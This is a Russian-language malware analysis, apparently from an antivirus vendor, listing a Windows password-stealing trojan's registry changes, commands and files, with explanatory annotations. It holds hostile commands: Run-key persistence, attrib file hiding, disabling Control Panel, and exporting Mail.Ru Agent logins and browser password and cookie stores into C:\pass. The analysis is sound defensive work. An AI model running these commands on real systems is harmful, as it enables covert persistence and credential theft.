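Техническая информация
(Ниже единым списком перечислены изменения реестра, запускаемые команды, файлы и искомое окно; заголовков разделов в тексте нет.)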
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'wco' = '%WINDIR%\wco.exe' — запись в ключе Run обеспечивает автозапуск wco.exe при входе пользователя в систему
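- <SYSTEM32>\attrib.exe +a +s +h +r %WINDIR%\rar.exe — ключи +a +s +h +r задают атрибуты «архивный», «системный», «скрытый» и «только чтение»; такой файл не отображается в Проводнике при настройках по умолчанию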
- <SYSTEM32>\attrib.exe +a +s +h +r %WINDIR%\otpr.vbs
- <SYSTEM32>\attrib.exe +a +s +h +r %WINDIR%\wco.exe
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f — значение NoControlPanel = 1 запрещает пользователю открывать Панель управления
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "wco" /t REG_SZ /d "%WINDIR%\wco.exe" /f
- <SYSTEM32>\attrib.exe +a +s +h +r %WINDIR%\iwco.exe
- <SYSTEM32>\xcopy.exe Mra\Update\ver.txt C:\pass\MailAgent /K /H /G /Q /R /S /Y
- <SYSTEM32>\attrib.exe C:\pass +h +s +r
- <SYSTEM32>\attrib.exe %WINDIR%\wincs +h +s +r
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\wind2.bat" "
- <SYSTEM32>\xcopy.exe Mra\Base C:\pass\MailAgent /K /H /G /Q /R /S /Y /E
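- %WINDIR%\regedit.exe -ea C:\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3
- %WINDIR%\regedit.exe -ea C:\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2
  (обе команды экспортируют указанную ветку реестра Mail.Ru Агента в .reg-файл; судя по имени ключа, в ней хранятся данные учётных записей)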
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
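- C:\pass\Mozilla\signons.sqlite
- C:\pass\Chrome\cookies.sqlite
- C:\pass\Mozilla\key3.db
- %TEMP%\1.tmp\wind2.bat
- C:\pass\Mozilla\cookies.sqlite
  (имена signons.sqlite, key3.db и cookies.sqlite соответствуют файлам профиля Firefox: хранилищу сохранённых паролей, базе ключей и cookie-файлам. Каталог C:\pass с такими файлами — признак сбора учётных данных; пароли, сохранённые в браузерах и Mail.Ru Агенте на этой машине, следует считать скомпрометированными и сменить.)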
- C:\pass\Mozilla\signons.sqlite
- %TEMP%\1.tmp\wind2.bat
- C:\pass\Mozilla\key3.db
- C:\pass\Chrome\cookies.sqlite
- C:\pass\Mozilla\cookies.sqlite
- ClassName: 'RegEdit_RegEdit' WindowName: '' — RegEdit_RegEdit является классом окна Редактора реестра Windows (regedit.exe)